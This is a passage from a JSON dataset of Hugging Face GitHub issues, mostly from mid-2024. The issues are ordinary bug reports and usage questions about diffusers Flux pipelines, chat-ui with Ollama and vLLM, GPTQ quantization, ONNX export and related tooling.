model,\r\n provider='TensorrtExecutionProvider',\r\n provider_options=provider_options,\r\n session_options=session_options,\r\n )\r\n```\r\n\r\nTherefore, I want to know whether Optimum supports TensorRT or not. Or there is something wrong with the official doc to run TensorRT.\r\n\r\n### Expected behavior\r\n\r\nWhen loading the converted model by TensorRT, optimum should not repeat the converting process again.\r\n", "url": "https://github.com/huggingface/optimum/issues/1985", "state": "open", "labels": [ "bug" ], "created_at": "2024-08-08T08:46:14Z", "updated_at": "2024-08-29T11:24:35Z", "comments": 2, "user": "sherlcok314159" }, { "repo": "huggingface/diffusers", "number": 9127, "title": "flux.1-dev device_map didn't work", "body": "I try to use device_map to use multiple gpu's, but it not worked, how can I use all my gpus?\r\n", "url": "https://github.com/huggingface/diffusers/issues/9127", "state": "closed", "labels": [], "created_at": "2024-08-08T08:30:33Z", "updated_at": "2024-11-26T02:11:03Z", "comments": 33, "user": "hznnnnnn" }, { "repo": "huggingface/diffusers", "number": 9120, "title": "[ar] Translating docs to Arabic (\u0627\u0644\u0639\u0631\u0628\u064a\u0629)", "body": "\r\n\r\nHi!\r\n\r\nLet's bring the documentation to all the -speaking community \ud83c\udf10.\r\n\r\nWho would want to translate? Please follow the \ud83e\udd17 [TRANSLATING guide](https://github.com/huggingface/diffusers/blob/main/docs/TRANSLATING.md). Here is a list of the files ready for translation. Let us know in this issue if you'd like to translate any, and we'll add your name to the list.\r\n\r\nSome notes:\r\n\r\n* Please translate using an informal tone (imagine you are talking with a friend about Diffusers \ud83e\udd17).\r\n* Please translate in a gender-neutral way.\r\n* Add your translations to the folder called `` inside the [source folder](https://github.com/huggingface/diffusers/tree/main/docs/source).\r\n* Register your translation in `/_toctree.yml`; please follow the order of the [English version](https://github.com/huggingface/diffusers/blob/main/docs/source/en/_toctree.yml).\r\n* Once you're finished, open a pull request and tag this issue by including #issue-number in the description, where issue-number is the number of this issue. Please ping @stevhliu for review.\r\n* \ud83d\ude4b If you'd like others to help you with the translation, you can also post in the \ud83e\udd17 [forums](https://discuss.huggingface.co/c/discussion-related-to-httpsgithubcomhuggingfacediffusers/63).\r\n\r\nThank you so much for your help! \ud83e\udd17\r\n", "url": "https://github.com/huggingface/diffusers/issues/9120", "state": "closed", "labels": [], "created_at": "2024-08-07T21:04:54Z", "updated_at": "2024-10-29T08:14:24Z", "comments": 2, "user": "AhmedAlmaghz" }, { "repo": "huggingface/chat-ui", "number": 1394, "title": "I need to reload to get the response", "body": "![image](https://github.com/user-attachments/assets/7f7ec4b0-7978-468e-b793-d460d528ba84)\r\ni am using LLama 3.1 70B to chat, but it is so slow to get response and i need to reload to get response , is it because the model is overload ?", "url": "https://github.com/huggingface/chat-ui/issues/1394", "state": "closed", "labels": [ "support" ], "created_at": "2024-08-07T09:31:03Z", "updated_at": "2024-08-15T06:56:59Z", "comments": 2, "user": "renaldy-therry" }, { "repo": "huggingface/chat-ui", "number": 1393, "title": "Generation Error with Ollama - Inconsistent Output Generation", "body": "Hi,\r\n\r\nI'm experiencing issues while running GEMMA2 on Ollama. Specifically, I'm encountering the following problems:\r\n\r\nError on Message Generation:\r\n Whenever a new chat is created, every message results in the error:\r\n\r\n Error: Generation failed, in the back end\r\n\r\n No output is generated,on the front end.\r\n\r\nInconsistent Message Handling:\r\n After retrying the same message multiple times (ranging from 2 to 15 attempts), the message is eventually processed correctly and the output is displayed on the front end.\r\n\r\nServer Responsiveness:\r\n Despite the above issues, the server responds to every query.\r\n\r\nExpected Behavior:\r\nMessages should be processed and output generated on the first attempt without errors.\r\n\r\nAdditional Context:\r\n\r\n Ollama Version: 0.3.3\r\n GEMMA2:2b (I've tried others models and the problem is the same)\r\n Operating System: CentOS\r\nRelevant Logs:\r\nerror message: \r\n\r\n ERROR (537688): Generation failed\r\n err: {\r\n \"type\": \"Error\",\r\n \"message\": \"Generation failed\",\r\n \"stack\":\r\n Error: Generation failed\r\n at Module.generateFromDefaultEndpoint (/chat-ui/src/lib/server/generateFromDefaultEndpoint.ts:23:9)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async generateTitle (/chat-ui/src/lib/server/textGeneration/title.ts:54:10)\r\n at async Module.generateTitleForConversation (/chat-ui/src/lib/server/textGeneration/title.ts:17:19)\r\n\r\nIts something with the title of the conversation but retrying the message finally the conversations name is changed too. And messages after conversations name is changed have the same problem, rarely it works at first attempt.\r\n\r\nMy env.local:\r\n\r\n MONGODB_URL=\"mongodb://localhost:27017\"\r\n HF_TOKEN=Mytoken\r\n OPENAI_API_KEY=\"ollama\"\r\n MODELS=`[\r\n {\r\n \"name\": \"google/gemma-2-2b-it\",\r\n \"chatPromptTemplate\": \"{{#each messages}}{{#ifUser}}user\\n{{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}}\\nmodel\\n{{/ifUser}}{{#ifAssistant}}{{content}}\\n{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"max_new_tokens\": 2048,\r\n \"stop\": [\"\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"type\": \"ollama\",\r\n \"baseURL\": \"http://127.0.0.1:11434\",\r\n \"ollamaName\" : \"gemma2:2b\"\r\n }\r\n ]\r\n },\r\n ]`\r\n \r\n USE_LOCAL_WEBSEARCH=true\r\n\r\n\r\n\r\nAny assistance in resolving this issue would be greatly appreciated. Thank you!", "url": "https://github.com/huggingface/chat-ui/issues/1393", "state": "open", "labels": [ "support" ], "created_at": "2024-08-07T09:02:19Z", "updated_at": "2024-08-07T11:05:19Z", "comments": 1, "user": "juanjuanignacio" }, { "repo": "huggingface/chat-ui", "number": 1392, "title": "Cannot send the message and get response in hugging chat", "body": "I cannot send message and get a response from llm, and i cannot click \"activate\" to change model in huggingchat (https://huggingface.co/chat/)", "url": "https://github.com/huggingface/chat-ui/issues/1392", "state": "closed", "labels": [ "support", "huggingchat" ], "created_at": "2024-08-07T08:37:01Z", "updated_at": "2024-08-07T09:06:59Z", "comments": 4, "user": "renaldy-therry" }, { "repo": "huggingface/text-embeddings-inference", "number": 371, "title": "how to support a SequenceClassification model", "body": "### Feature request\r\n\r\nI have a model can be run by transformers.AutoModelForSequenceClassification.from_pretrained, how can i serve it in TEI\r\n\r\n### Motivation\r\n\r\nto support more models\r\n\r\n### Your contribution\r\n\r\nYES", "url": "https://github.com/huggingface/text-embeddings-inference/issues/371", "state": "closed", "labels": [], "created_at": "2024-08-06T10:45:00Z", "updated_at": "2024-10-17T10:24:09Z", "user": "homily707" }, { "repo": "huggingface/chat-ui", "number": 1387, "title": "CopyToClipBoardBtn in ChatMessage.svelte has a bug?", "body": "https://github.com/huggingface/chat-ui/blob/6de97af071c69aa16e8f893adebb46f86bdeeaff/src/lib/components/chat/ChatMessage.svelte#L378-L384\r\n\r\nWhen compared to other components, classNames is the only difference here.\r\nWhen rendered, the icon appears faint in the browser.\r\nIs there a reason for this, or is it a bug?\r\n\r\nhttps://github.com/huggingface/chat-ui/blob/6de97af071c69aa16e8f893adebb46f86bdeeaff/src/lib/components/CopyToClipBoardBtn.svelte#L37-L51\r\n\r\nIt seems that the classNames of IconCopy is the cause of the faintness.", "url": "https://github.com/huggingface/chat-ui/issues/1387", "state": "closed", "labels": [ "bug", "good first issue", "front" ], "created_at": "2024-08-06T04:59:45Z", "updated_at": "2024-08-12T09:35:21Z", "comments": 5, "user": "calycekr" }, { "repo": "huggingface/diffusers", "number": 9092, "title": "Fluxpipeline report model_index.json not found", "body": "### Describe the bug\r\n\r\nI use the Fluxpipeline and report no file model_index.json.\r\nI read other issue and set the `revision=\"refs/pr/3\"`,but it doesn't work, how can i do to solve this problem and how to use the T5xxl as text encoder? thanks for your help\r\n\r\n### Reproduction\r\n\r\n```\r\nimport torch\r\nfrom diffusers import FluxPipeline\r\n\r\npipe = FluxPipeline.from_pretrained(\"/opt/ml/volume/default/aigc/project/chanPin/models/flux\", revision=\"refs/pr/3\",torch_dtype=torch.bfloat16)\r\npipe.enable_model_cpu_offload()\r\n\r\nprompt = \"a tiny astronaut hatching from an egg on the moon\"\r\nout = pipe(\r\n prompt=prompt, \r\n guidance_scale=3.5, \r\n height=768, \r\n width=1360, \r\n num_inference_steps=50,\r\n).images[0]\r\nout.save(\"image.png\")\r\n```\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nubuntu 20.04\r\n\r\n### Who can help?\r\n\r\n@sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/9092", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-06T01:48:40Z", "updated_at": "2024-08-06T02:25:03Z", "comments": 3, "user": "chongxian" }, { "repo": "huggingface/trl", "number": 1900, "title": "How to speed up PPOTrainer .generate()?", "body": "During PPO, I'm finding that `.generate()` is extremely slow. The following call takes ~3 and a half minutes for batch size of 64 with a 1.4B parameter policy LM:\r\n\r\n```\r\nppo_trainer.generate(\r\n input_token_ids_list,\r\n pad_token_id=policy_model_tokenizer.eos_token_id,\r\n return_prompt=False,\r\n **generation_config_dict,\r\n )\r\n```\r\n\r\nHow can I accelerate sampling? The same function call with `vllm` takes <30s for setup and execution, so I feel like I am doing something suboptimally.", "url": "https://github.com/huggingface/trl/issues/1900", "state": "closed", "labels": [], "created_at": "2024-08-05T18:35:31Z", "updated_at": "2024-10-01T06:35:50Z", "user": "RylanSchaeffer" }, { "repo": "huggingface/chat-ui", "number": 1386, "title": "System role problem running Gemma 2 on vLLM", "body": "Hello,\r\n\r\nIn running chat ui and trying some models, with phi3 and llama i had no problem but when I run gemma2 in vllm Im not able to make any good api request,\r\nin env.local:\r\n{\r\n \"name\": \"google/gemma-2-2b-it\",\r\n \"id\": \"google/gemma-2-2b-it\",\r\n \"chatPromptTemplate\": \"{{#each messages}}{{#ifUser}}user\\n{{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}}\\nmodel\\n{{/ifUser}}{{#ifAssistant}}{{content}}\\n{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 2048,\r\n \"stop\": [\"\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"type\": \"openai\",\r\n \"baseURL\": \"http://127.0.0.1:8000/v1\",\r\n \r\n }\r\n ]\r\n\r\n}\r\n\r\nand I always have the same response in vllm server:\r\n\r\nERROR 08-05 12:39:06 serving_chat.py:118] Error in applying chat template from request: System role not supported\r\nINFO: 127.0.0.1:42142 - \"POST /v1/chat/completions HTTP/1.1\" 400 Bad Request\r\n\r\ndo someone know if I have to change and how do change the chat template or deactivate system role ? is it a vllm problem or a chat ui problem?\r\n\r\nThank U!", "url": "https://github.com/huggingface/chat-ui/issues/1386", "state": "closed", "labels": [ "support" ], "created_at": "2024-08-05T13:22:10Z", "updated_at": "2024-11-07T21:39:47Z", "comments": 5, "user": "juanjuanignacio" }, { "repo": "huggingface/optimum", "number": 1981, "title": " [GPTQQuantizer] How to use multi-GPU for GPTQQuantizer?", "body": "### System Info\r\n\r\n```shell\r\nhello\uff1a\r\nI encountered an out-of-memory error while attempting to quantize a model using GPTQQuantizer. The error seems to be related to the large size of the model weights. Below is the quantization code I used:\r\n\r\nfrom optimum.gptq import GPTQQuantizer\r\n\r\nquantizer = GPTQQuantizer(\r\n bits=4,\r\n dataset='wikitext2',\r\n block_name_to_quantize=decoder.layers,\r\n disable_exllama=False,\r\n damp_percent=0.1,\r\n group_size=128\r\n)\r\n\r\nThe error message I received is as follows:\r\ntorch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 784.00 MiB. GPU 0 has a total capacty of 10.90 GiB of which 770.44 MiB is free. Including non-PyTorch memory\r\n\r\nEnvironment:\r\n\u00b7 Transformers version: 4.43.2\r\n\u00b7 Optimum version: 1.21.2\r\n\u00b7 GPU model and memory: 11GiB * 2\r\n\u00b7 CUDA version: 12.4\r\nQuestion:How to use multi-GPU for GPTQQuantizer? thank you!\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@kashif @srush @danieldk @mausch @dmaniloff How to use multi-GPU for GPTQQuantizer?\r\n\r\n### Information\r\n\r\n- [x] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\nfrom optimum.gptq import GPTQQuantizer\r\n```python\r\nquantizer = GPTQQuantizer(\r\n bits=4,\r\n dataset='wikitext2',\r\n block_name_to_quantize=decoder.layers,\r\n disable_exllama=False,\r\n damp_percent=0.1,\r\n group_size=128\r\n)\r\n```\r\n\r\n### Expected behavior\r\n\r\nuse multi-GPU for GPTQQuantizer?", "url": "https://github.com/huggingface/optimum/issues/1981", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-05T07:58:11Z", "updated_at": "2024-08-08T02:19:18Z", "user": "RunTian1" }, { "repo": "huggingface/datasets", "number": 7087, "title": "Unable to create dataset card for Lushootseed language", "body": "### Feature request\n\nWhile I was creating the dataset which contained all documents from the Lushootseed Wikipedia, the dataset card asked me to enter which language the dataset was in. Since Lushootseed is a critically endangered language, it was not available as one of the options. Is it possible to allow entering languages that aren't available in the options?\n\n### Motivation\n\nI'd like to add more information about my dataset in the dataset card, and the language is one of the most important pieces of information, since the entire dataset is primarily concerned collecting Lushootseed documents.\n\n### Your contribution\n\nI can submit a pull request", "url": "https://github.com/huggingface/datasets/issues/7087", "state": "closed", "labels": [ "enhancement" ], "created_at": "2024-08-04T14:27:04Z", "updated_at": "2024-08-06T06:59:23Z", "comments": 2, "user": "vaishnavsudarshan" }, { "repo": "huggingface/diffusers", "number": 9076, "title": "Add a better version of 'callback_on_step_end' for FluxPipeline", "body": "**Is your feature request related to a problem? Please describe.**\r\nThere is a huge delay before starting the inference and once the 4th step is complete and there is no callback for that and it feels like it is stuck, just want a more responsive version.\r\n```\r\nprompt = \"A cat holding a sign that says hello world\"\r\nimage = pipe(\r\n prompt,\r\n guidance_scale=0.0,\r\n output_type=\"pil\",\r\n num_inference_steps=4,\r\n max_sequence_length=256,\r\n generator=torch.Generator(\"cuda\").manual_seed(0)\r\n).images[0]\r\nprint('started saving file')\r\nimage.save(\"flux-schnell.png\")\r\n```\r\nIf you run the above code, it feels like you are stuck at step 0 and then after 4/4 is done\r\nI am using a 48GB A40\r\n\r\n**Describe the solution you'd like.**\r\nCan we get some kind of callback for these two delays as well\r\n", "url": "https://github.com/huggingface/diffusers/issues/9076", "state": "closed", "labels": [ "stale" ], "created_at": "2024-08-04T10:34:04Z", "updated_at": "2024-11-23T00:24:14Z", "comments": 3, "user": "nayan-dhabarde" }, { "repo": "huggingface/diffusers", "number": 9069, "title": "TypeError: expected np.ndarray (got numpy.ndarray)", "body": "### Describe the bug\r\n\r\n``` \r\nimport torch\r\nfrom diffusers import FluxPipeline\r\npipe = FluxPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16)\r\npipe.to(\"cuda\")\r\nprompt = \"A cat holding a sign that says hello world\"\r\n# Depending on the variant being used, the pipeline call will slightly vary.\r\n# Refer to the pipeline documentation for more details.\r\nimage = pipe(prompt, num_inference_steps=4, guidance_scale=0.0).images[0]\r\nimage.save(\"flux.png\")\r\n ```\r\n with this code, it report the error as following:\r\n```\r\n (flux) xiangyu@gpu06:~/st/flux$ python gen.py \r\nLoading pipeline components...: 0%| | 0/7 [00:00\r\n pipe = FluxPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 876, in from_pretrained\r\n loaded_sub_model = load_sub_model(\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/pipelines/pipeline_loading_utils.py\", line 700, in load_sub_model\r\n loaded_sub_model = load_method(os.path.join(cached_folder, name), **loading_kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/schedulers/scheduling_utils.py\", line 157, in from_pretrained\r\n return cls.from_config(config, return_unused_kwargs=return_unused_kwargs, **kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/configuration_utils.py\", line 260, in from_config\r\n model = cls(**init_dict)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/configuration_utils.py\", line 653, in inner_init\r\n init(self, *args, **init_kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/schedulers/scheduling_flow_match_euler_discrete.py\", line 76, in __init__\r\n timesteps = torch.from_numpy(timesteps).to(dtype=torch.float32)\r\nTypeError: expected np.ndarray (got numpy.ndarray)\r\n```\r\n\r\n### Reproduction\r\n```python\r\nimport torch\r\nfrom diffusers import FluxPipeline\r\npipe = FluxPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16)\r\npipe.to(\"cuda\")\r\nprompt = \"A cat holding a sign that says hello world\"\r\n# Depending on the variant being used, the pipeline call will slightly vary.\r\n# Refer to the pipeline documentation for more details.\r\nimage = pipe(prompt, num_inference_steps=4, guidance_scale=0.0).images[0]\r\nimage.save(\"flux.png\")\r\n ```\r\n with this code, it report the error as following:\r\n (flux) xiangyu@gpu06:~/st/flux$ python gen.py \r\nLoading pipeline components...: 0%| | 0/7 [00:00\r\n pipe = FluxPipeline.from_pretrained(\"black-forest-labs/FLUX.1-dev\", torch_dtype=torch.bfloat16)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 876, in from_pretrained\r\n loaded_sub_model = load_sub_model(\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/pipelines/pipeline_loading_utils.py\", line 700, in load_sub_model\r\n loaded_sub_model = load_method(os.path.join(cached_folder, name), **loading_kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/schedulers/scheduling_utils.py\", line 157, in from_pretrained\r\n return cls.from_config(config, return_unused_kwargs=return_unused_kwargs, **kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/configuration_utils.py\", line 260, in from_config\r\n model = cls(**init_dict)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/configuration_utils.py\", line 653, in inner_init\r\n init(self, *args, **init_kwargs)\r\n File \"/home/user/xiangyu/.conda/envs/flux/lib/python3.10/site-packages/diffusers/schedulers/scheduling_flow_match_euler_discrete.py\", line 76, in __init__\r\n ti", "url": "https://github.com/huggingface/diffusers/issues/9069", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-03T12:45:03Z", "updated_at": "2024-10-27T06:43:32Z", "comments": 11, "user": "xiangyumou" }, { "repo": "huggingface/evaluate", "number": 611, "title": "How to customize my own evaluator and metrics?", "body": "I'm facing a task on VQA, where I need to compute [VQA](https://visualqa.org/evaluation.html) accuracy](https://visualqa.org/evaluation.html) as follows:\r\n```math\r\n\\text{Acc}(ans) = \\min{ \\left\\{ \\frac{\\text{\\# humans that said } ans }{3}, 1 \\right\\} }\r\n```\r\nI have following questions:\r\n1. Do I need to customize my own metric? If so, can I only create `metrics/vqa_accuracy/vqa_accuracy.py` without other operations, such as running `evaluate-cli create \"accuracy name\" --module_type \"metric\"`?\r\n2. I found that there is no suitable `evaluator` for my task, and I'm not sure if it is possible to customize my own `evaluator`, since I didn't find any document on creating new `evaluator`.", "url": "https://github.com/huggingface/evaluate/issues/611", "state": "closed", "labels": [], "created_at": "2024-08-02T08:37:47Z", "updated_at": "2024-08-15T02:26:30Z", "user": "Kamichanw" }, { "repo": "huggingface/diffusers", "number": 9055, "title": "ImportError: cannot import name 'StableDiffusionLoraLoaderMixin' from 'diffusers.loaders'", "body": "### Describe the bug\n\nI get this error in diffusers versions 25,26,27,28,29, how can I solve it?\n\n### Reproduction\n\n\r\nimport ast\r\nimport gc\r\nimport inspect\r\nimport math\r\nimport warnings\r\nfrom collections.abc import Iterable\r\nfrom typing import Any, Callable, Dict, List, Optional, Union\r\n\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom packaging import version\r\nfrom transformers import CLIPImageProcessor, CLIPTextModel, CLIPTokenizer, CLIPVisionModelWithProjection\r\n\r\nfrom diffusers.configuration_utils import FrozenDict\r\nfrom diffusers.image_processor import PipelineImageInput, VaeImageProcessor\r\nfrom diffusers.loaders import (\r\n FromSingleFileMixin,\r\n IPAdapterMixin,\r\n StableDiffusionLoraLoaderMixin,\r\n TextualInversionLoaderMixin,\r\n)\r\nfrom diffusers.models import AutoencoderKL, UNet2DConditionModel\r\nfrom diffusers.models.attention import Attention, GatedSelfAttentionDense\r\nfrom diffusers.models.attention_processor import AttnProcessor2_0\r\nfrom diffusers.models.lora import adjust_lora_scale_text_encoder\r\nfrom diffusers.pipelines import DiffusionPipeline\r\nfrom diffusers.pipelines.pipeline_utils import StableDiffusionMixin\r\nfrom diffusers.pipelines.stable_diffusion.pipeline_output import StableDiffusionPipelineOutput\r\nfrom diffusers.pipelines.stable_diffusion.safety_checker import StableDiffusionSafetyChecker\r\nfrom diffusers.schedulers import KarrasDiffusionSchedulers\r\nfrom diffusers.utils import (\r\n USE_PEFT_BACKEND,\r\n deprecate,\r\n logging,\r\n replace_example_docstring,\r\n scale_lora_layers,\r\n unscale_lora_layers,\r\n)\r\nfrom diffusers.utils.torch_utils import randn_tensor\r\n\n\n### Logs\n\n```shell\nTraceback (most recent call last):\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/workspace/llm_sd.py\", line 149, in \r\n llm_sd(args=args)\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/workspace/llm_sd.py\", line 10, in llm_sd\r\n pipe = DiffusionPipeline.from_pretrained(\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 1147, in from_pretrained\r\n pipeline_class = _get_pipeline_class(\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 380, in _get_pipeline_class\r\n return get_class_from_dynamic_module(\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/diffusers/utils/dynamic_modules_utils.py\", line 452, in get_class_from_dynamic_module\r\n return get_class_in_module(class_name, final_module.replace(\".py\", \"\"))\r\n File \"/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/diffusers/utils/dynamic_modules_utils.py\", line 164, in get_class_in_module\r\n module = importlib.import_module(module_path)\r\n File \"/usr/lib/python3.10/importlib/__init__.py\", line 126, in import_module\r\n return _bootstrap._gcd_import(name[level:], package, level)\r\n File \"\", line 1050, in _gcd_import\r\n File \"\", line 1027, in _find_and_load\r\n File \"\", line 1006, in _find_and_load_unlocked\r\n File \"\", line 688, in _load_unlocked\r\n File \"\", line 883, in exec_module\r\n File \"\", line 241, in _call_with_frames_removed\r\n File \"/home/wrusr/.cache/huggingface/modules/diffusers_modules/git/llm_grounded_diffusion.py\", line 32, in \r\n from diffusers.loaders import (\r\nImportError: cannot import name 'StableDiffusionLoraLoaderMixin' from 'diffusers.loaders' (/home/wrusr/miniconda3/workspace/sd_llm_script_env/lib/python3.10/site-packages/diffusers/loaders/__init__.py)\n```\n\n\n### System Info\n\ntorch==2.0.1\r\ntorchvision==0.15.2\r\ntorchaudio==2.0.2\r\naccelerate==0.21.0\r\ntransformers==4.39.3\r\ndiffusers==0.27.2\r\npeft==0.10.0\r\nnumpy==1.25.2\r\npython3.10\n\n### Who can help?\n\n@yiyixuxu @asomoza", "url": "https://github.com/huggingface/diffusers/issues/9055", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-02T07:58:16Z", "updated_at": "2024-08-02T09:32:12Z", "comments": 2, "user": "MehmetcanTozlu" }, { "repo": "huggingface/optimum", "number": 1980, "title": "Issue converting moss-moon-003-sft-int4 model to ONNX format", "body": "### System Info\n\n```shell\nI've been working with the owlv2 model and have encountered an issue while attempting to convert it into ONNX format using the provided command:\r\noptimum-cli export onnx --task text-generation -m\"/HDD/cz/tools/moss/\" --trust-remote-code \"HDD/cz/moss_onnx/\"\r\nUnfortunately, I'm facing the following error:\r\nTrying to export a moss model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`.\r\nAs I am relatively new to this process, I'm unsure about the necessity and usage of custom ONNX configuration. Could you please provide some guidance on how to address this issue? Any assistance or insights would be greatly appreciated.\r\n\r\nThank you for your attention to this matter.\n```\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nhttps://huggingface.co/fnlp/moss-moon-003-sft-int4/tree/main\n\n### Expected behavior\n\nConvert the model to onnx format", "url": "https://github.com/huggingface/optimum/issues/1980", "state": "open", "labels": [ "bug", "onnx" ], "created_at": "2024-08-02T01:18:46Z", "updated_at": "2024-10-08T15:51:12Z", "comments": 0, "user": "ZhiChengWHU" }, { "repo": "huggingface/transformers", "number": 32376, "title": "AutoModel how to modify config?", "body": "```\r\nconfig = AutoConfig.from_pretrained(\r\n **self.params, trust_remote_code=True\r\n )\r\n config.vision_config.use_flash_attn = False\r\n print(config.vision_config)\r\n self.model = AutoModel.from_pretrained(\r\n **self.params, trust_remote_code=True, config=config\r\n ).eval()\r\n```\r\n\r\nI need disable `use_flash_attn ` to False forcely when loading a model from pretrained. But looks like the config set didn't have any effect.\r\n\r\nWhy and how", "url": "https://github.com/huggingface/transformers/issues/32376", "state": "closed", "labels": [], "created_at": "2024-08-01T12:40:44Z", "updated_at": "2024-08-02T02:30:22Z", "user": "lucasjinreal" }, { "repo": "huggingface/diffusers", "number": 9039, "title": "how to load_lora_weights in FlaxStableDiffusionPipeline", "body": "### Describe the bug\n\nhow to load lora in FlaxStableDiffusionPipeline, there are no load_lora_weights in FlaxStableDiffusionPipeline\n\n### Reproduction\n\nN/A\n\n### Logs\n\n_No response_\n\n### System Info\n\nkaggle tpu vm\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9039", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2024-08-01T11:23:52Z", "updated_at": "2024-10-15T03:23:54Z", "user": "ghost" }, { "repo": "huggingface/diffusers", "number": 9038, "title": "how to use prompt weight in FlaxStableDiffusionPipeline", "body": "### Describe the bug\n\nI can see there are prompt_embeds in StableDiffusionPipeline to support Prompt weighting, But how to do that in FlaxStableDiffusionPipeline? there are not prompt_embeds in StableDiffusionPipeline\n\n### Reproduction\n\nN/A\n\n### Logs\n\n_No response_\n\n### System Info\n\nkaggle tpu vm \n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9038", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2024-08-01T10:44:37Z", "updated_at": "2024-10-14T18:25:55Z", "user": "ghost" }, { "repo": "huggingface/diffusers", "number": 9032, "title": "how to get the minimun working example of FlaxStableDiffusionPipeline in google colab with tpu runtime", "body": "### Describe the bug\n\nI try the code in google colab with tpu runtime\r\n```\r\n! python3 -m pip install -U diffusers[flax]\r\nimport diffusers, os\r\npipeline = diffusers.StableDiffusionPipeline.from_single_file('https://huggingface.co/chaowenguo/pal/blob/main/chilloutMix-Ni.safetensors')\r\npipeline.save_pretrained('chilloutMix', safe_serialization=False)\r\npipeline, params = diffusers.FlaxStableDiffusionPipeline.from_pretrained('./chilloutMix', from_pt=True, safety_checker=None)\r\n```\r\nI always get Your session crashed for an unknown reason. I want to get the mininum working example in google colab with tpu runtime\n\n### Reproduction\n\nN/A\n\n### Logs\n\n_No response_\n\n### System Info\n\ngoogle colab with tpu runtime\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9032", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-08-01T03:58:34Z", "updated_at": "2024-11-04T15:04:13Z", "user": "ghost" }, { "repo": "huggingface/diffusers", 